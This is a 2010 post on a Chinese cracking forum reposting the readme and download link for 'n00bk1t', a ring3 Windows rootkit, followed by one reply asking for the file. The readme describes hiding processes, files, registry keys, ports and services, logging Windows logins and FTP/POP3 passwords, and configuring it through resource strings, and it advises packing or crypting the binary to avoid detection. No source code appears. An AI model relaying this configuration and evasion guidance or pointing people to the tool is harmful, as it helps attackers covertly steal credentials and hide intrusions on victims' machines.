吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 4818|回复: 1
收起左侧

[其他转载] Nostalgia: n00bk1t, an advanced ring3 rootkit in C

[复制链接]
Hmily 发表于 2010-3-11 17:06
I had this laying around for a few years now. Maybe someone finds it useful :)

n00bk1t
-------

0x01 About
----------

n00bk1t is a user-mode (ring3) rootkit. It is very similar to hxdef but it's written
completely in C (well, 99% of it). It has the ability to hide processes/files/regkeys/
ports/services/.... It also logs windows login (local,via TS and runas) information and
ftp/pop3 (plain/ssl) password(s). It's not perfect but it fool's alot of users ;)



0x02. Configuration
-------------------

n00bk1t uses string resources instead of a configuration file. This leaves us with one file.
Resources are easily editted with a resource editor like PE Explorer or ResHacker.
That's why i advise you to use a packer/crypter on the final exe. ;)
Multiple configuration items in one string must be delimited by ; (fe. root.exe;shit.exe)
For ports you can use ranges, fe. 1001-1050;666;10-20.
Space regkey contains a string value in the form of "DISK"="SPACE_TO_HIDE_IN_BYTES",
fe. "C"="100000000". (you can use 64-bit numbers).
Regkey must start with: \\Registry fe. \\Registry\\Machine\\Test

String values:

String 01 -> Root process(es)
String 02 -> Hidden process(es)
String 03 -> Hidden driver(s)
String 04 -> Hidden file(s)/directory(-ies)
String 05 -> Hidden local tcp port(s)
String 06 -> Hidden remote tcp port(s)
String 07 -> Hidden udp port(s)
String 08 -> Hidden regkey(s)
String 09 -> Hidden regkey value(s)
String 10 -> Hidden service(s)
String 11 -> Hidden space regkey
String 12 -> Login/ftp/smtp/pop3... logfile
String 13 -> Run as service ? (0=No/1=Yes)
String 14 -> Service name
String 15 -> Service display name
String 16 -> Service description
String 17 -> Shell name (unused for now)

0x03 Usage:
-----------

If you set String 13 to 1, n00bk1t wil try to install and start itselfs as a service. If that fails
or String 13 is set to 0, n00bk1t will run as a normal process.

Parameters:
-ui: uninstall, unstable (does not delete service)
-ud: update (you can edit the resources and then perform an update)

0x04. Thanks to:
----------------

- Holy Father, creator of hxdef. RIP
- z0mbie, creator of a lots of things, i'm using his LDE 1.05, thx dude, wherever you are ;)
- Greg & Jamie, the guys from rootkit.com, and not to forget the rootkit.com community !
- Agner Fog, creator of the random c lib i use
- Ratter, also creator of a lots of thing, i thank him for his work on the lsalogonuser hook ;)
- Einstein, for his work on the raw registry stuff
- PE386, for the blacklight file hiding idea


http://www.rootkit.com/vault/jeffosz/n00bkit_v0.9d.zip

n00bkit_v0.9d.zip

1.72 MB, 下载次数: 19, 下载积分: 吾爱币 -1 CB

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

五哥 发表于 2013-6-5 17:52
我要下载玩玩。。。H,,,你那里下载的,那个地址我一直下载不了。
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

返回列表

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-11-16 11:58

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表